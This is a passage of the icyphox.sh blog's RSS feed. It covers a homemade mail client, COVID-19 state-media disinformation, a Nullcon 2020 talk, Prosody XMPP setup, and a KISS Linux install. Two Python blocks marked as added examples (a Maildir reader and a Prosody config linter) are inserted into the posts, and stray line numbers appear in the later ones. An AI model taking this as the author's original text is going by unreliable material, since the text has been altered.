similar to mailx—a prompt-based UI. The reason behind this UX decision
is simple: it’s easier for me to write. :)</p>

<p>Speaking of writing it, it’s being written in a mix of Python and bash.
Why? Because Python’s <code>email</code> and <code>mailbox</code> modules are fantastic, and
I don’t think I want to parse Maildirs in bash. “But why not pure
Python?” Well, I’m going to be shelling out a lot (more on this in a bit),
and writing interactive UIs in bash is a lot more intuitive, thanks to
some of the nifty features that later versions of bash have—<code>read</code>,
<code>mapfile</code> etc.</p>

<p>The reason I’m shelling out is that two key components of this
client that I haven’t yet talked about—<code>mbsync</code> and <code>msmtp</code>—are in
use, for IMAP and SMTP respectively. And <code>mbsync</code> uses the Maildir
format, which is why I’m relying on Python’s <code>mailbox</code> package. Why is
this in the standard library anyway?!</p>

<p>The architecture of the client is pretty interesting (and possibly very
stupid), but here’s what happens:</p>

<ul>
<li>UI and prompt stuff in bash</li>
<li>emails are read using <code>less</code></li>
<li>email templates (RFC 2822) are parsed and generated in Python</li>
<li>this is sent to bash in STDOUT, like</li>
</ul>

<div class="codehilite"><pre><span></span><code><span class="nv">msg</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>./mael-parser <span class="s2">"</span><span class="nv">$maildir_message_path</span><span class="s2">"</span><span class="k">)</span><span class="s2">"</span>
</code></pre></div>

<p>These kinds of one-way (bash -> Python) calls are what drive the entire
process. I’m not sure what to think of it. Perhaps I might just give up
and write the entire thing in Python.
Or…I might just scrap this entirely and just shut up and use aerc.
I don’t know yet. The code does seem to be growing in size rapidly. It’s
about ~350 LOC in two days of writing (Python + bash). New problems
arise every now and then and it’s pretty hard to keep track of all of
this. It’ll be cool when it’s all done though (I think).</p>
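<p>As an added example (not mael’s own code), here is what a <code>mael-parser</code>-style script can look like using the standard-library <code>mailbox</code> and <code>email</code> modules the post mentions: Python writes a constructed Maildir, lists it for the prompt, and renders one message as plain text for bash to capture. Only the <code>text/plain</code> part is ever emitted; the addresses and messages are constructed and the script name is hypothetical.</p>

```python
"""A mael-style Maildir reader: Python parses, prints plain text to stdout,
and the bash front end captures it with msg="$(./mael-parser "$path")".

Added example, not mael's own code. It uses only the standard-library
`mailbox` and `email` modules the post mentions; every message is constructed.
"""
import mailbox
import os
import sys
import tempfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser


def render_message(path):
    """Parse one Maildir file and return the text that `less` will show.

    Only the text/plain part is rendered; HTML alternatives are ignored and
    attachments are listed by name, so mail content never reaches a browser
    or a shell interpreter.
    """
    with open(path, "rb") as f:
        msg = BytesParser(policy=policy.default).parse(f)
    out = [f"{h}: {msg.get(h, '')}" for h in ("From", "To", "Date", "Subject")]
    out.append("")
    body = msg.get_body(preferencelist=("plain",))
    out.append(body.get_content().rstrip("\n") if body else "[no text/plain part]")
    names = [p.get_filename() or "<unnamed>" for p in msg.iter_attachments()]
    if names:
        out += ["", "Attachments: " + ", ".join(names)]
    return "\n".join(out)


def list_messages(maildir):
    """Return (path, sender, subject) for every message in new/ and cur/;
    headers only, which is all the prompt UI's index needs."""
    entries = []
    for sub in ("new", "cur"):
        d = os.path.join(maildir, sub)
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            with open(path, "rb") as f:
                hdrs = BytesParser(policy=policy.default).parse(f, headersonly=True)
            entries.append((path, str(hdrs.get("From", "")), str(hdrs.get("Subject", ""))))
    return entries


def build_sample_maildir(root):
    """Write two constructed messages with mailbox.Maildir (as mbsync would).
    `root` must not exist yet: Maildir(create=True) creates tmp/new/cur."""
    box = mailbox.Maildir(root, create=True)

    plain = EmailMessage()
    plain["From"] = "alice@example.test"  # constructed addresses
    plain["To"] = "icy@example.test"
    plain["Date"] = "Sun, 29 Mar 2020 10:00:00 +0000"
    plain["Subject"] = "mael progress"
    plain.set_content("How is the client coming along?\n")
    box.add(plain)

    mixed = EmailMessage()
    mixed["From"] = "bob@example.test"
    mixed["To"] = "icy@example.test"
    mixed["Date"] = "Sun, 29 Mar 2020 11:30:00 +0000"
    mixed["Subject"] = "logs attached"
    mixed.set_content("Plain version of the mail.\n")
    mixed.add_alternative("<p>HTML version, never rendered</p>", subtype="html")
    mixed.add_attachment(b"\x00\x01\x02", maintype="application",
                         subtype="octet-stream", filename="blob.bin")
    box.add(mixed)
    box.close()


def demo():
    """Build the sample Maildir in a temp dir and return {subject: rendered}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "Maildir")
        build_sample_maildir(root)
        return {subj: render_message(path) for path, _, subj in list_messages(root)}


if __name__ == "__main__":
    # From bash: msg="$(./mael-parser "$maildir_message_path")"
    if len(sys.argv) > 1:
        print(render_message(sys.argv[1]))
    else:
        print("\n\n".join(demo().values()))
```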

<p>If only things just worked.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-oss">
<p>I have yet to open source it; this post will be updated with
a link to it when I do. <a href="#fnref-oss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/mael</link><pubDate>Sun, 29 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mael</guid></item><item><title>COVID-19 disinformation</title><description><![CDATA[<p>The virus spreads around the world, along with a bunch of disinformation
and potential malware / phishing campaigns. There are many actors,
pushing many narratives—some similar, some different.</p>

<p>Interestingly, the three big players in the information warfare
space—Russia, Iran and China—seem to be running similar stories on
their state-backed media outlets. While they all tend to lean towards
the same, fairly anti-U.S. sentiments—that is, blaming the US for
weaponizing the crisis for political gain—Iran and Russia’s content
comes off as more…conspiratorial.
In essence, they claim that the COVID-19 virus is a “bioweapon”
developed by the U.S.</p>

<p>Russian news agency
<a href="https://twitter.com/RT_com/status/1233187558793924608">RT tweeted</a>:</p>

<blockquote>
 <p>Show of hands, who isn’t going to be surprised if it ever gets
 revealed that #coronavirus is a bioweapon?</p>
</blockquote>

<p>RT also published
<a href="https://www.rt.com/usa/481485-coronavirus-russia-state-department/">an article</a>
mocking the U.S. for concerns over Russian disinformation.
Another article by RT,
<a href="https://www.rt.com/op-ed/481831-coronavirus-kill-bill-capitalism-communism/">an op-ed</a>,
suggests the virus’ impact on financial markets might bring about the
reinvention of communism and the end of the global capitalist system.
Russian state-sponsored media can also be seen amplifying Iranian
conspiracy theories—including the Islamic Revolutionary Guard Corps’
(IRGC) suggestion that COVID-19
<a href="https://www.rt.com/news/482405-iran-coronavirus-us-biological-weapon/">is a U.S. bioweapon</a>.</p>

<p>Iranian media outlets appear to be running stories having similar
themes, as well. Here’s one
<a href="https://www.presstv.com/Detail/2020/03/05/620217/US-coronavirus-James-Henry-Fetzer">by PressTV</a>,
where they very boldly claim that the virus was developed by
the U.S. and/or Israel, to use as a bioweapon against Iran. Another
<a href="https://www.presstv.com/Detail/2020/03/05/620213/Coronavirus-was-produced-in-a-laboratory">nonsensical piece</a>
by PressTV suggests that
“there are components of the virus that are related to HIV that could not have occurred naturally”.
The same article pushes another theory:</p>

<blockquote>
 <p>There has been some speculation that as the Trump Administration has
 been constantly raising the issue of growing Chinese global
 competitiveness as a direct threat to American national security and
 economic dominance, it might be possible that Washington has created
 and unleashed the virus in a bid to bring Beijing’s growing economy
 and military might down a few notches. It is, to be sure, hard to
 believe that even the Trump White House would do something so
 reckless, but there are precedents for that type of behavior</p>
</blockquote>

<p>These “theories”, as is evident, are getting wilder and wilder.</p>

<p>Unsurprisingly, China produces the most content related to the
coronavirus, but they’re quite distinct in comparison to Russian and
Iranian media. The general theme behind Chinese narratives is
criticizing the West for…a lot of things.</p>

<p>Global Times claims that
<a href="http://www.globaltimes.cn/content/1178494.shtml">democracy is an insufficient system</a>
to battle the coronavirus. They <a href="http://www.globaltimes.cn/content/1178494.shtml">blame the U.S.</a>
for unfair media coverage against China, and other <a href="http://www.globaltimes.cn/content/1180630.shtml">anti-China
narratives</a>.
There are a ton of other articles that play the racism/discrimination
card—I wouldn’t blame them though. <a href="http://www.globaltimes.cn/content/1178465.shtml">Here’s one</a>.</p>

<p>In the case of India, most disinfo (actually, misinfo) is just
pseudoscientific / alternative medicine / cures in the form of WhatsApp
forwards—“Eat foo! Eat bar!”.<sup class="footnote-ref" id="fnref-cowpiss"><a href="#fn-cowpiss">1</a></sup></p>

<p>I’ve also been noticing a <em>ton</em> of COVID-19 / coronavirus related domain
registrations happening. Expect phishing and malware campaigns using the
virus as a theme. In the past 24 hrs, ~450 <code>.com</code> domains alone were
registered.</p>

<p><img src="/static/img/corona_domains.png" alt="corona domains" /></p>

<p>Anywho, there are bigger problems at hand—like the fact that my uni
still hasn’t suspended classes!</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-cowpiss">
<p><a href="https://www.thehindu.com/news/national/coronavirus-group-hosts-cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ece">https://www.thehindu.com/news/national/coronavirus-group-hosts-cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ece</a> <a href="#fnref-cowpiss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/covid19-disinfo</link><pubDate>Sun, 15 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/covid19-disinfo</guid></item><item><title>Nullcon 2020</title><description><![CDATA[<p><strong>Disclaimer</strong>: Political.</p>

<p>This year’s conference was at the Taj Hotel and Convention center, Dona
Paula, and its associated party at Cidade de Goa, also by Taj.
Great choice of venue, perhaps even better than last time. The food was
fine, the views were better.</p>

<p>With <em>those</em> things out of the way—let’s talk talks. I think
I preferred the panels to the talks—I enjoy a good, stimulating
discussion as opposed to only half-understanding a deeply technical
talk—but that’s just me. But there was this one talk that I really
enjoyed, perhaps due to its unintended comedic value; I’ll get into that
later.</p>

<p>The list of panels/talks I attended in order:</p>

<p><strong>Day 1</strong></p>

<ul>
<li>Keynote: The Metadata Trap by Micah Lee (Talk)</li>
<li>Securing the Human Factor (Panel)</li>
<li>Predicting Danger: Building the Ideal Threat Intelligence Model (Panel)</li>
<li>Lessons from the Cyber Trenches (Panel)</li>
<li>Mlw 41#: a new sophisticated loader by APT group TA505 by Alexey Vishnyakov (Talk)</li>
<li>Taking the guess out of Glitching by Adam Laurie (Talk)</li>
<li>Keynote: Cybersecurity in India – Information Asymmetry, Cross Border
Threats and National Sovereignty by Saumil Shah (Talk)</li>
</ul>

<p><strong>Day 2</strong></p>

<ul>
<li>Keynote: Crouching hacker, killer robot? Removing fear from
cyber-physical security by Stefano Zanero (Talk)</li>
<li>Supply Chain Security in Critical Infrastructure Systems (Panel)</li>
<li>Putting it all together: building an iOS jailbreak from scratch by
Umang Raghuvanshi (Talk)</li>
<li>Hack the Law: Protection for Ethical Cyber Security Research in India
(Panel)</li>
</ul>

<h2 id="re-closing-keynote">Re: Closing keynote</h2>

<p>I wish I could link the talk, but it hasn’t been uploaded just yet. I’ll
do it once it has. So, I’ve a few comments I’d like to make on some of
Saumil’s statements.</p>

<p>He proposed that the security industry trust the user more, and let them
make the decisions pertaining to personal security / privacy.
Except…that’s just not going to happen. If all users were capable
of making good, security-first choices—we as an industry wouldn’t
need to exist. But that is unfortunately not the case.
Users are dumb. They value convenience and immediacy over
security. That’s the sad truth of the modern age.</p>

<p>Another thing he proposed was that the Indian Government build our own
“Military Grade” and “Consumer Grade” encryption.</p>

<p><em>…what?</em></p>

<p>A “security professional” suggesting that we roll our own crypto? What
even. Oh and, to top it off—when
<a href="https://twitter.com/tame_wildcard">Raman</a> very rightly countered,
saying that the biggest opponent to encryption <em>is</em> the Government, and
trusting them to build safe cryptosystems is probably not wise, he
responded by saying something to the effect of “Eh, who cares? If they
want to backdoor it, let them.”</p>

<p>Bruh moment.</p>

<p>He also had some interesting things to say about countering
disinformation. He said, and I quote, “Join the STFU University”.</p>

<p>¿wat? Is that your best solution?</p>

<p>Judging by his profile, and certain other things he said in the talk, it
is safe to conclude that his ideals are fairly…nationalistic. I’m not
one to police political opinions, I couldn’t care less which way you
lean, but the statements made in the talk were straight up
incorrect.</p>

<h2 id="closing-thoughts">Closing thoughts</h2>

<p>This came out more rant-like than I’d intended. It is also the first
blog post where I dip my toes into politics. I’ve some thoughts on more
controversial topics for my next entry. That’ll be fun, especially when
my follower count starts dropping. LULW.</p>

<p>Saumil, if you ever end up reading this, note that this is not
a personal attack. I think you’re a cool guy.</p>

<p>Note to the Nullcon organizers: you guys did a fantastic job running the
conference despite Corona-chan’s best efforts. I’d like to suggest one
little thing though—please VET YOUR SPEAKERS more!</p>

<p><img src="/static/img/nullcon_beach.jpg" alt="group pic" /></p>
]]></description><link>https://icyphox.sh/blog/nullcon-2020</link><pubDate>Mon, 09 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/nullcon-2020</guid></item><item><title>Setting up Prosody for XMPP</title><description><![CDATA[<p>Remember the <a href="/blog/irc-for-dms/">IRC for DMs</a> article I wrote a while
back? Well…it’s safe to say that IRC didn’t hold up too well. It first
started with the bot. Buggy code, crashed a lot—we eventually gave up
and didn’t bring the bot back up. Then came the notifications, or lack
thereof. Revolution IRC has a bug where your custom notification rules
just get ignored after a while. In my case, this meant that
notifications for <code>#crimson</code> stopped entirely. Unless, of course, Nerdy
pinged me each time.</p>

<p>Again, none of these problems are inherent to IRC itself. IRC is
fantastic, but perhaps wasn’t the best fit for our usecase. I still do
use IRC though, just not for 1-on-1 conversations.</p>

<h2 id="why-xmpp">Why XMPP?</h2>

<p>For one, it’s better suited for 1-on-1 conversations. It also has
support for end-to-end encryption (via OMEMO), something IRC doesn’t
have.<sup class="footnote-ref" id="fnref-otr"><a href="#fn-otr">1</a></sup> Also, it isn’t centralized (think: email).</p>

<h2 id="soprosody">So…Prosody</h2>

<p><a href="https://prosody.im">Prosody</a> is an XMPP server. Why did I choose this
over ejabberd, OpenFire, etc.? No reason, really. Their website looked
cool, I guess.</p>

<h3 id="installing">Installing</h3>

<p>Setting it up was pretty painless (I’ve <a href="/blog/mailserver">experienced
worse</a>). If you’re on a Debian-derived system, add:</p>

<pre><code># modify according to your distro
deb https://packages.prosody.im/debian buster main
</code></pre>

<p>to your <code>/etc/apt/sources.list</code>, and:</p>

<pre><code># apt update
# apt install prosody
</code></pre>

<h3 id="configuring">Configuring</h3>

<p>Once installed, you will find the config file at
<code>/etc/prosody/prosody.cfg.lua</code>. Add your XMPP user (we will make this
later) to the <code>admins = {}</code> line.</p>

<pre><code>admins = {"user@chat.example.com"}
</code></pre>

<p>Head to the <code>modules_enabled</code> section, and add this to it:</p>

<pre><code>modules_enabled = {
 "posix";
 "omemo_all_access";
...
 -- uncomment these
 "groups";
 "mam";
 -- and any others you think you may need
}
</code></pre>

<p>We will install the <code>omemo_all_access</code> module later.</p>

<p>Set <code>c2s_require_encryption</code>, <code>s2s_require_encryption</code>, and
<code>s2s_secure_auth</code> to <code>true</code>.
Set the <code>pidfile</code> to <code>/tmp/prosody.pid</code> (or just leave it as default?).</p>

<p>By default, Prosody stores passwords in plain-text, so fix that by
setting <code>authentication</code> to <code>"internal_hashed"</code>.</p>

<p>Head to the <code>VirtualHost</code> section, and add your vhost. Right above it,
set the path to the HTTPS certificate and key:</p>

<pre><code>certificates = "certs" -- relative to your config file location
https_certificate = "certs/chat.example.com.crt"
https_key = "certs/chat.example.com.key"
...

VirtualHost "chat.example.com"
</code></pre>

<p>I generated these certs using Let’s Encrypt’s <code>certbot</code>; you can use
whatever. Here’s what I did:</p>

<pre><code># certbot --nginx -d chat.example.com
</code></pre>

<p>This generates certs at <code>/etc/letsencrypt/live/chat.example.com/</code>. You can
trivially import these certs into Prosody’s <code>/etc/prosody/certs/</code> directory using:</p>

<pre><code># prosodyctl cert import /etc/letsencrypt/live/chat.example.com
</code></pre>

<h3 id="plugins">Plugins</h3>

<p>All the modules for Prosody can be <code>hg clone</code>’d from
<a href="https://hg.prosody.im/prosody-modules">https://hg.prosody.im/prosody-modules</a>. You will, obviously, need
Mercurial installed for this.</p>

<p>Clone it somewhere, and:</p>

<pre><code># cp -R prosody-modules/mod_omemo_all_access /usr/lib/prosody/modules
</code></pre>

<p>Do the same thing for whatever other module you choose to install. Don’t
forget to add it to the <code>modules_enabled</code> section in the config.</p>

<h3 id="adding-users">Adding users</h3>

<p><code>prosodyctl</code> makes this a fairly simple task:</p>

<pre><code>$ prosodyctl adduser user@chat.example.com
</code></pre>

<p>You will be prompted for a password. You can optionally enable
user registrations from XMPP/Jabber clients (security risk!) by setting
<code>allow_registration = true</code>.</p>

<p>I may have missed something important, so here’s <a href="https://x.icyphox.sh/prosody.cfg.lua">my
config</a> for reference.</p>
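<p>As an added example (not part of Prosody and not the post’s config), here is a small Python checker for the settings above: it reads the simple <code>key = value</code> lines of a <code>prosody.cfg.lua</code>, tracks which <code>VirtualHost</code> a line belongs to so per-host overrides win over global values, and reports plain-text password storage, encryption that is not required, and open registration. Both configs it runs against are constructed for the example.</p>

```python
"""Lint a prosody.cfg.lua for the settings the post hardens.

Added example, not Prosody's code nor the post's config. It parses only the
simple `key = value` lines these settings use (booleans, numbers and quoted
strings) and tracks which VirtualHost a line belongs to. Both sample configs
below are constructed.
"""
import re

SETTING_RE = re.compile(
    r'^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*'
    r'(true|false|\d+|"[^"]*"|\'[^\']*\')\s*(?:--.*)?$')
VHOST_RE = re.compile(r'^\s*VirtualHost\s+"([^"]+)"')

# Settings the post sets by hand, with the value each must have.
REQUIRED = {
    "authentication": "internal_hashed",  # default internal_plain: plain-text passwords
    "c2s_require_encryption": True,
    "s2s_require_encryption": True,
    "s2s_secure_auth": True,
}


def parse_settings(text):
    """Return {scope: {key: value}}; scope is '*' for the global section
    (everything before the first VirtualHost) or the host name."""
    scopes, scope = {"*": {}}, "*"
    for raw in text.splitlines():
        if raw.lstrip().startswith("--"):
            continue  # full-line Lua comment
        host = VHOST_RE.match(raw)
        if host:
            scope = host.group(1)
            scopes.setdefault(scope, {})
            continue
        m = SETTING_RE.match(raw)
        if not m:
            continue  # tables such as modules_enabled = { ... } are skipped
        key, val = m.groups()
        if val in ("true", "false"):
            val = val == "true"
        elif val[0] in "\"'":
            val = val[1:-1]
        else:
            val = int(val)
        scopes[scope][key] = val
    return scopes


def effective(scopes, host, key):
    """A setting inside a VirtualHost block overrides the global one."""
    return scopes.get(host, {}).get(key, scopes["*"].get(key))


def audit(text):
    """Return (host, setting, problem) triples; an empty list means the
    config has everything the post asks for."""
    scopes = parse_settings(text)
    hosts = [h for h in scopes if h != "*"] or ["*"]
    findings = []
    for host in hosts:
        for key, want in REQUIRED.items():
            have = effective(scopes, host, key)
            if have != want:
                findings.append((host, key, f"is {have!r}, expected {want!r}"))
        if effective(scopes, host, "allow_registration") is True:
            findings.append((host, "allow_registration",
                             "open registration: anyone can create accounts"))
    return findings


WEAK_CFG = """\
admins = { }
modules_enabled = {
    "roster";
    "saslauth";
}
allow_registration = true
-- authentication not set, so the internal_plain default applies
c2s_require_encryption = false
pidfile = "/tmp/prosody.pid"

VirtualHost "chat.example.com"
"""

HARDENED_CFG = """\
admins = { "user@chat.example.com" }
allow_registration = false
authentication = "internal_hashed"
c2s_require_encryption = true
s2s_require_encryption = true
s2s_secure_auth = true
certificates = "certs" -- relative to the config file
https_certificate = "certs/chat.example.com.crt"
https_key = "certs/chat.example.com.key"

VirtualHost "chat.example.com"
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CFG), ("hardened", HARDENED_CFG)):
        print(name, audit(cfg) or "ok")
```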

<h2 id="closing-notes">Closing notes</h2>

<p>That’s pretty much all you need for 1-on-1 E2EE chats. I don’t know much
about group chats just yet—trying to create a group in Conversations
gives a “No group chat server found”. I will figure it out later.</p>

<p>Another thing that doesn’t work in Conversations is adding an account
using an <code>SRV</code> record.<sup class="footnote-ref" id="fnref-srv"><a href="#fn-srv">2</a></sup> Which kinda sucks, because having a <code>chat.</code>
subdomain isn’t very clean, but whatever.</p>

<p>Oh, also—you can message me at
<a href="xmpp:icy@chat.icyphox.sh">icy@chat.icyphox.sh</a>.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-otr">
<p>I’m told IRC supports OTR, but I haven’t ever tried. <a href="#fnref-otr" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
</li>

<li id="fn-srv">
<p><a href="https://prosody.im/doc/dns">https://prosody.im/doc/dns</a> <a href="#fnref-srv" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/prosody</link><pubDate>Tue, 18 Feb 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/prosody</guid></item><item><title>Status update</title><description><![CDATA[<p>It’s only been two weeks since I got back to campus, and we’ve
<em>already</em> got our first round of cycle tests starting this Tuesday.
Granted, I returned a week late, but…that’s nuts!</p>

<p>We’re two whole weeks into 2020; I should’ve been working on something
status update worthy, right? Not really, but we’ll see.</p>

<h2 id="no-more-cloudflare">No more Cloudflare!</h2>

<p>Yep. If you weren’t aware—pre-2020 this site was behind Cloudflare
SSL and their DNS. I have since migrated off it to
<a href="https://he.net">he.net</a>, thanks to a highly upvoted Lobste.rs comment.
Because of this switch, I in fact learnt a ton about DNS.</p>

<p>Migrating to HE was very painless, but I did have to research a lot
about PTR records—Cloudflare kinda dumbs it down. In my case, I had to
rename my DigitalOcean VPS instance to the FQDN, which then
automagically created a PTR record at DO’s end.</p>

<h2 id="i-dropped-icyrc">I dropped icyrc</h2>

<p>The IRC client I was working on during the end of last
December–early-January? Yeah, I lost interest. Apparently writing C and
ncurses isn’t very fun or stimulating.</p>

<p>This also means I’m back on weechat. Until I find another client that
plays well with ZNC, that is.</p>

<h2 id="kiss-stuff">KISS stuff</h2>

<p>I now maintain two new packages in the KISS community repository—2bwm
and aerc! The KISS package system is stupid simple to work with. Creating
packages has never been easier.</p>

<h2 id="icyphoxshfriendsfriends"><a href="/friends">icyphox.sh/friends</a></h2>

<p>Did you notice that yet? I’ve been curating a list of people I know IRL
and online, and linking to their online presence. This is like a webring
of sorts, and promotes inter-site traffic—making the web more “web”
again.</p>

<p>If you know me, feel free to <a href="/about#contact">hit me up</a> and I’ll link
your site too! My apologies if I’ve forgotten your name.</p>

<h2 id="patreon">Patreon!</h2>

<p>Is this big news? I dunno, but yes—I now have a Patreon. I figured I’d
cash in on the newfound traffic my site’s been getting. There won’t be
any exclusive content or any tiers or whatever. Nothing will change.
Just a place for y’all to toss me some $$$ if you wish to do so. ;)</p>

<p>Oh, and it’s at <a href="https://patreon.com/icyphox">patreon.com/icyphox</a>.</p>

<h2 id="misc">Misc.</h2>

<p>The Stormlight Archive is likely the <em>best</em> epic I have ever read till
date. I’m still not done yet; about 500 odd pages to go as of this
writing. But wow, Brandon really does know how to build worlds and magic
systems. I cannot wait to read all about the
<a href="https://coppermind.net/wiki/Cosmere">cosmere</a>.</p>

<p>I have also been working out for the past month or so. I can see them
gainzzz. I plan to keep track of my progress, I just don’t know how to
quantify it. Perhaps I’ll log the number of reps × sets I do each time,
and with what weights. I can then look back to see if either the weights
have increased since, or the number of reps × sets have. If you know of
a better way to quantify progress, let me know! I’m pretty new to this.</p>
]]></description><link>https://icyphox.sh/blog/2020-01-18</link><pubDate>Sat, 18 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2020-01-18</guid></item><item><title>Vimb&#58; my Firefox replacement</title><description><![CDATA[<p>After having recently installed <a href="https://getkiss.org">KISS</a>, and
building Firefox from source, I was exposed to the true monstrosity that
Firefox—and web browsers in general—is. It took all of 9 hours to
build the dependencies and then Firefox itself.</p>

<p>Sure, KISS now ships Firefox binaries in the
<a href="https://github.com/kisslinux/repo/tree/master/extra/firefox-bin">firefox-bin</a>
package; I decided to get rid of that slow mess anyway.</p>

<h2 id="enter-vimb">Enter vimb</h2>

<p><a href="https://fanglingsu.github.io/vimb/">vimb</a> is a browser based on
<a href="https://webkitgtk.org/">webkit2gtk</a>, with a Vim-like interface.
<code>webkit2gtk</code> builds in less than a minute—it blows Firefox out of
the water, on that front.</p>

<p>There isn’t much of a UI to it—if you’ve used Vimperator/Pentadactyl
(Firefox plugins), vimb should look familiar to you.
It can be configured via a <code>config.h</code> or a text based config file at
<code>~/.config/vimb/config</code>.
Each “tab” opens a new instance of vimb in a new window, but this can
get messy really fast if you have a lot of tabs open.</p>

<h2 id="enter-tabbed">Enter tabbed</h2>

<p><a href="https://tools.suckless.org/tabbed/">tabbed</a> is a tool to <em>embed</em> X apps
which support xembed into a tabbed UI. This can be used in conjunction
with vimb, like so:</p>

<pre><code>tabbed vimb -e
</code></pre>

<p>where the <code>-e</code> flag is populated with the <code>XID</code> by tabbed. Configuring
Firefox-esque keybinds in tabbed’s <code>config.h</code> is relatively easy. Once
that’s done—voilà! A fairly sane, Vim-like browsing experience that’s
faster and has a smaller footprint than Firefox.</p>

<h2 id="ad-blocking">Ad blocking</h2>

<p>Ad blocking support isn’t built-in and there is no plugin system
available. There are two options for ad blocking:</p>

<ol>
<li><a href="https://github.com/jun7/wyebadblock">wyebadblock</a></li>
<li><code>/etc/hosts</code></li>
</ol>

<h2 id="caveats">Caveats</h2>

<p><em>Some</em> websites tend to not work because they detect vimb as an older
version of Safari (same web engine). This is a minor inconvenience, and
not a dealbreaker for me. I also cannot login to Google’s services for
some reason, which is mildly annoying, but it’s good in a way—I am now
further incentivised to dispose of my Google account.</p>

<p>And here’s the screenshot y’all were waiting for:</p>

<p><img src="/static/img/vimb.png" alt="vimb" /></p>
1273]]></description><link>https://icyphox.sh/blog/mnml-browsing</link><pubDate>Thu, 16 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mnml-browsing</guid></item><item><title>Five days in a TTY</title><description><![CDATA[<p>This new semester has been pretty easy on me, so far. I hardly ever
1274have any classes (again, so far), and I’ve a ton of free time on my
1275hands. This calls for—yep—a distro hop! </p>
1276
1277<h2 id="why-kiss">Why KISS?</h2>
1278
1279<p><a href="https://getkiss.org">KISS</a> has been making rounds on the interwebz lately.<sup class="footnote-ref" id="fnref-hn"><a href="#fn-hn">1</a></sup>
1280The Hacker News post spurred <em>quite</em> the discussion. But then again,
1281that is to be expected from Valleybros who use macOS all day. :^)</p>
1282
1283<p>From the website,</p>
1284
1285<blockquote>
1286 <p>An independent Linux® distribution with a focus on simplicity and the
1287 concept of “less is more”. The distribution targets <em>only</em> the x86-64
1288 architecture and the English language.</p>
1289</blockquote>
1290
1291<p>Like many people did in the HN thread, “simplicity” here is not to be
1292confused with “ease”. It is, instead, simplicity in terms of less and
1293cleaner code—no
1294<a href="https://www.urbandictionary.com/define.php?term=poetterware">Poetterware</a>.</p>
1295
1296<p>This, I can get behind. A clean system with less code is like a clean
1297table. It’s nice to work on. It also implies security to a certain
1298extent since there’s a smaller attack surface. </p>
1299
1300<p>The <a href="https://github.com/kisslinux/kiss"><code>kiss</code></a> package manager is written
1301in pure POSIX sh, and does <em>just enough</em>. Packages are compiled from
1302source and <code>kiss</code> automatically performs dependency resolution. Creating
1303packages is ridiculously easy too.</p>
1304
1305<p>Speaking of packages, all packages—both official & community
1306repos—are run through <code>shellcheck</code> before getting merged. This is
1307awesome; I don’t think this is done in any other distro.</p>
1308
1309<p>In essence, KISS sucks less.</p>
1310
1311<h2 id="installing-kiss">Installing KISS</h2>
1312
1313<p>The <a href="https://getkiss.org/pages/install">install guide</a> is very easy to
1314follow. Clear instructions that make it hard to screw up; that didn’t
1315stop me from doing so, however.</p>
1316
1317<h3 id="day-1">Day 1</h3>
1318
1319<p>Although technically not in a TTY, it was still not <em>in</em> the KISS
1320system—I’ll count it. I’d compiled the kernel in the chroot and
1321decided to use <code>efibootmgr</code> instead of GRUB. <code>efibootmgr</code> is a neat tool
1322to modify the Intel Extensible Firmware Interface (EFI). Essentially,
1323you boot the <code>.efi</code> directly as opposed to choosing which boot entry
1324you want to boot, through GRUB. Useful if you have just one OS on the
1325system. Removes one layer of abstraction.</p>
1326
1327<p>Adding a new EFI entry is pretty easy. For me, the command was:</p>
1328
1329<pre><code>efibootmgr --create \
1330 --disk /dev/nvme0n1 \
1331 --part 1 \
1332 --label "KISS Linux" \
1333 --loader /vmlinuz \
1334 --unicode 'root=/dev/nvme0n1p3 rw' # kernel parameters
1335</code></pre>
1336
1337<p>Mind you, this didn’t work the first time, or the second, or the
1338third … a bunch of trial and error (and asking on <code>#kisslinux</code>)
1339later, it worked.</p>
1340
1341<p>Well, it booted, but not into KISS. Took a while to figure out that the
1342culprit was <code>CONFIG_BLK_DEV_NVME</code> not having been set in the kernel
1343config. Rebuild & reboot later, I was in.</p>
1344
1345<h3 id="day-2">Day 2</h3>
1346
1347<p>Networking! How fun. An <code>ip a</code> and I see that both USB tethering
1348(ethernet) and wireless don’t work. Great. Dug around a bit—missing
1349wireless drivers were the problem. Found my driver, a binary <code>.ucode</code> from
1350Intel (eugh!). The whole day was spent in figuring out why the kernel
1351would never load the firmware. I tried different variations—loading
1352it as a module (<code>=m</code>), baking it in (<code>=y</code>) but no luck.</p>
1353
1354<h3 id="day-3">Day 3</h3>
1355
1356<p>I then tried Alpine’s kernel config but that was so huge and had a <em>ton</em>
1357of modules and took far too long to build each time, much to my
1358annoyance. The diff between their config and mine was about 3000 lines! Too much
1359to sift through. On a whim, I decided to scrap my entire KISS install
1360and start afresh.</p>
1361
1362<p>For some odd reason, after doing the <em>exact</em> same things I’d done
1363earlier, my wireless worked this time. Ethernet didn’t, and still
1364doesn’t, but that’s ok.</p>
1365
1366<p>Building <code>xorg-server</code> was next, which took about an hour, mostly thanks
1367to spotty internet. The build went through fine; what didn’t work was
1368input after starting X. Adding my user to the <code>input</code> group wasn’t
